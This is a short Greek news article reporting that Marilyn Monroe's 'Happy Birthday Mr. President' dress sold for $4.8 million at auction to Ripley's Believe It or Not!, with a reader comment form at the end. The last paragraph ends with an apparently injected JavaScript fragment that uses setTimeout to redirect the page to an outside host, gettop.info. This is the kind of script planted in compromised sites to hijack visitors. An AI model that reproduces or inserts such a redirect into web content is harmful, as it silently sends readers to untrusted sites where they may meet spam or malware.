Αντί 4,8 εκατ. δολ. πωλήθηκε θρυλικό φόρεμα της Μέριλιν (BINTEO)

0
7

Στο σφυρί βγήκε το θρυλικό φόρεμα που συγκλόνισε το πλήθος όταν η Μέριλιν Μονρό τραγούδησε ηδυπαθώς για τα 45α γενέθλια του Τζον Κένεντι «Happy Birthday Mr. President». Το φόρεμα κεντημένο στο χέρι με χρυσή κλωστή και 2.500 κρυστάλλινες πούλιες πωλήθηκε αντί 4,8 εκατ. δολ. σε δημοπρασία στο Μπέβερλι Χιλς, πολύ περισσότερο από τα δύο με τρία εκατ. δολάρια που εκτιμούσε ο οίκος Julien’s Auctions.

Το φόρεμα ανήκει πλέον στο Ripley’s Believe It or Not!, μια αυτοκρατορία μέσων ενημέρωσης που διαθέτει επίσης αλυσίδα μουσείων, ένα εκ των οποίων στο Χόλιγουντ, αφιερωμένα στα παράξενα αντικείμενα και σε είδη που έχουν ιστορική σημασία.

Το φόρεμα πωλήθηκε σε μια πρώτη δημοπρασία το 1999 στον πλούσιο επιχειρηματία Martin Zweig αντί 1,3 εκατ. δολαρίων. Η επιτυχία του φορέματος είναι τέτοια που ένα απλό σκίτσο του από τον σχεδιαστή του Bob Mackie πωλήθηκε 10.000 δολάρια.

Ωστόσο, τιμή ρεκόρ για πώληση φορέματος της Μέριλιν παραμένουν τα 5,5 εκατομμύρια δολάρια που έδωσε προς πενταετίας ο αγοραστής του φορέματος της αμερικανίδας σταρ στη σκηνή της ταινίας «Επτά χρόνια Φαγούρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here